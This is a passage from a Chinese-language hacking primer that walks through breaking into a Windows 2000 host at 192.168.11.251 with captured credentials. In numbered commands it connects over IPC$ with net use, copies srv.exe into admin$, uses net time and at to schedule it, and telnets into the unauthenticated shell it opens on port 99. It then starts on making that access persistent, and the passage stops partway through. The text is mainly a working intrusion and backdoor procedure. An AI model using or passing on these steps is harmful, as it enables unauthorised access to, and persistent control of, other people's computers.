[黑客入门全程图解].吴自容,武新华.等编著.文字版,精确还原

下面我们以192.168.11.251 这个IP 地址为例进行讲解，得到密码后，是如何获取对方的资源并留下后门的。
打开W i n d o w s 2 0 0 0 自带的命令提示行（在运行框里输入“c m d ”命令），进入命令窗口，运行：
① C:\〉net use \\192.168.11.251\IPC$ 密码 /user:用户名
其中，用户名是用流光扫描到的用户，密码为该用户的密码。用此命令可以与1 9 2 . 1 6 8 . 1 1 . 2 5 1 建立一个连
接，运行后显示“命令成功完成”。这样通过I P C $ 的远程登录就成功了。
② C:\〉copy srv.exe \\192.168.11.251\admin$
登陆成功之后先复制一个T e l n e t 的程序上去，（小榕流光安装目录下的T o o l s 目录里的S r v . e x e ），这个程
序是在目标主机上面开一个Telnet 服务，端口为9 9（或者用其他后门软件开一个端口以供登录）。这里的admin$
指的是c:\winnt\system32 目录，还可以使用c $、d $，即C 盘与D 盘，这要看你复制到什么地方，以后可以利
用定时服务启动它。
③ C:\〉net time \\192.168.11.251
在启动定时服务之前，需要先了解对方的时间。用此命令可以检查目标计算机的时间。假设192.168.11.251
的当前时间是2002/7/19 上午11:00 ，命令成功完成。
④ C:\〉at \\192.168.11.251 11:05 srv.exe
检查到目标计算机的时间后，就可以用a t 命令启动s r v . e x e 了，这里设置的时间要在目标计算机时间后，
否则启动不了。显示：新加了一项作业，其作业 ID = 0。
⑤ C:\〉net time \\192.168.11.251
再查查到时间没有，如果192.168.11.251 的当前时间是2002/7/19 上午11:05，那就准备开始下面的命令。
⑥ C:\〉telnet 192.168.11.251 99
这里用Telnet 命令登录上去，注意端口是99。Telnet 默认的是23 端口，但是我们使用 srv.exe 在对方计
算机中为我们建立一个99 端口的Shell。这里不需要验证身份，直接登录，如果显示：c:\winnt\system32〉，表
明成功登录上去了。
虽然我们T e l n e t 上去了，但是s r v . e x e 是一次性的，下次登录还要再激活！所以需要建立一个T e l n e t 服
务！这就要用到n t l m （在小榕流光安装目录下的T o o l s 目录里也可以找到）。然后在本地打开命令提示符，另外
打开一个窗口，输入：